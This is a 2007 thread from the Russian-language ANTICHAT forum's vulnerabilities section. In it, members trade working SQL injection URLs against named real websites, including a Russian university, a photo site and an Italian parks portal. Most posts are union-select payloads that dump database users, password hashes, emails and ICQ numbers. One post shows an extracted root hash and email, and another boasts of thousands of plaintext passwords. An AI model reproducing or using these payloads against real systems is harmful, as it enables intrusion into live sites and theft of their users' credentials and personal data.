HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

sql-not_fin
  #1  
Старый 11.05.2007, 10:37
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
Arrow sql-not_fin

Фотосайт.ру

Код:
http://www.photosight.ru/pforum/showflat.php?Cat=&Board=photo_common&page=0&view=collapsed&sb=5&o=&fpart=all&Number=-658026+union+select+1,2,3,aes_decrypt(aes_encrypt(concat_ws(0x3a,user(),version(),database()),0x55),0x55)/*
вывод в заголовке, довести до ума не получилось, таблицы не подобрал.

Последний раз редактировалось _Pantera_; 11.05.2007 в 22:41..
 
Ответить с цитированием

  #2  
Старый 11.05.2007, 16:54
kamaz
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013

Репутация: 453
По умолчанию

2Серенький
Код:
http://www.photosight.ru/pforum/showflat.php?Cat=&Board=photo_common&page=0&view=collapsed&sb=5&o=&fpart=all&Number=-658026+union+select+1,2,3,aes_decrypt(aes_encrypt(concat_ws(0x3a,user,password),0x55),0x55)%20from%20mysql.user/*

Последний раз редактировалось _Pantera_; 11.05.2007 в 22:42..
 
Ответить с цитированием

  #3  
Старый 11.05.2007, 20:43
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869

Репутация: 3033


По умолчанию

5-я версия мускула, лимит в помощь, 30 таблиц.. ответ где то там)
Код:
http://www.maplestoryatlas.com/field.php?id=-33+union+select+1,TABLE_NAME,version()+from+INFORMATION_SCHEMA.TABLES+limit+1,1/*
Здесь все тривиально
Код:
http://tenleaders.com/field.php?id=-12+union+select+concat_ws(char(58),user,password),2,3+from+mysql.user/*
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ

Последний раз редактировалось Constantine; 11.05.2007 в 20:49..
 
Ответить с цитированием

  #4  
Старый 11.05.2007, 22:40
p-range
Участник форума
Регистрация: 05.02.2006
Сообщений: 168
Провел на форуме:
749524

Репутация: 715
По умолчанию

edu-all.ru
Цитата:
http://www.edu-all.ru/pages/forum/thread.asp?idthr=1'+or+1=(SELECT+TOP+1+TABLE_NAME+ FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NO T+IN+('dtproperties','clients','posting','sysconst raints','syssegments','tems','thread'))--

Цитата:
http://www.edu-all.ru/pages/forum/thread.asp?idthr=1'+or+1=(SELECT+TOP+1+COLUMN_NAME +FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME= 'clients'+AND+COLUMN_NAME+NOT+IN+('akt_cl','col_cl ','comment_cl','dateend_cl','dateup_cl','dats_cl', 'dog_cl','har_cl','id_cl','mesto_cl','name_cl','op l_cl','sh_cl','srok_cl','st_cl','vid_cl'))--
_хмм_
 
Ответить с цитированием

  #5  
Старый 12.05.2007, 21:12
KPOT_f!nd
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
Провел на форуме:
3405508

Репутация: 1745


По умолчанию

Код:
http://www.turkuaz.us/news_det.php?newsId=-587+union+select+1,user(),database(),version(),5,6,7,8,9/*&catId=32
Код:
http://lonuestro.us/sectionfiles/article.php?id=-218+union+select+1,database(),version(),4,5,6,7,user(),9,10,11,12/*
так сильно не увлекался находкой таблиц. . .
 
Ответить с цитированием

  #6  
Старый 12.05.2007, 23:39
kamaz
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013

Репутация: 453
По умолчанию

Чтобы увидеть скулю, нужна регистрация.
Для тех, кому влом регистрироваться -
Login - kokok
Pass - 123456
Код:
http://www.myflavour.nl/forum.php?view=write&tid=748&action=reply&quote=-20244%20union%20select%201,2,user()/*
Код:
http://www.geelix.com/hud.php?id=-238622154%20union%20select%201,2,concat_ws(char(58),idUser,logins,email,passw)%20from%20user/*
Код:
http://www.cbisis.be/baptises.php?an=-1992%20union%20select%20id,concat_ws(char(58),username,password,email,icq),3,4%20from%20cbisis.forum_users/*
 
Ответить с цитированием

  #7  
Старый 13.05.2007, 10:11
KPOT_f!nd
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
Провел на форуме:
3405508

Репутация: 1745


По умолчанию

Код:
http://www.parks.it/news/dettaglio.php?id=-1221+union+select+1,user,password,4,user(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+mysql.user/*
root:0a9236882f7cf8a1
massimo@www.comunic.it
 
Ответить с цитированием

sql-inj
  #8  
Старый 13.05.2007, 17:33
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
Arrow sql-inj

http://www.naturmed.ru

mysql 5

смотрим таблицы
Цитата:
http://www.naturmed.ru/index.php?id=2&subid=-1+union+select+table_name+from+information_schema. tables+limit+24,1/*
смотрим количество таблиц
Цитата:
http://www.naturmed.ru/index.php?id=2&subid=-1+union+select+count(table_name)+from+information_ schema.tables/*
их всего 25, но что-то ни черта интересного среди них не нашел.

Пелевин http://pelevin.nov.ru

Цитата:
http://pelevin.nov.ru/inews/index.php?n=-1161008436+union+select+1,2,3,4,concat_ws(0x3a,use r(),version(),database()),6/*

Последний раз редактировалось Серенький; 13.05.2007 в 17:44..
 
Ответить с цитированием

  #9  
Старый 14.05.2007, 03:12
[53x]Shadow
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120

Репутация: 2565
По умолчанию

Продолжаем тему выпускников (Предыдущие МГИМО и МФТИ) Коллекция пополняется!
Теперь НГТУ(Новочеркасск)
www.ngtu.ru

Код:
http://www.ngtu.ru/info/info.php?id=-1+ union+select+database() ,user(),version(),4,5 ,6,7,8,9,10,11,12,13,14,15,16/*
Код:
http://www.ngtu.ru/info/info.php?id=-1+unio n+select+email,icq,passw,4,5 ,6,7,8,9,10,11,12,13,14,15,16+from+users/*
Все стандартно аськи, почта, пароли (в открытом виде). Пользователей 4055!

Последний раз редактировалось [53x]Shadow; 14.05.2007 в 17:39..
 
Ответить с цитированием

  #10  
Старый 14.05.2007, 03:30
KPOT_f!nd
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
Провел на форуме:
3405508

Репутация: 1745


По умолчанию

___[53x]Shadow
Код:
http://www.ngtu.ru/info/info.php?id=-1+union+select+username,user_password,user_icq,user_email,5,6,7,8,9,10,11,12,13,14,15,16+from+phpbb_users/*
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.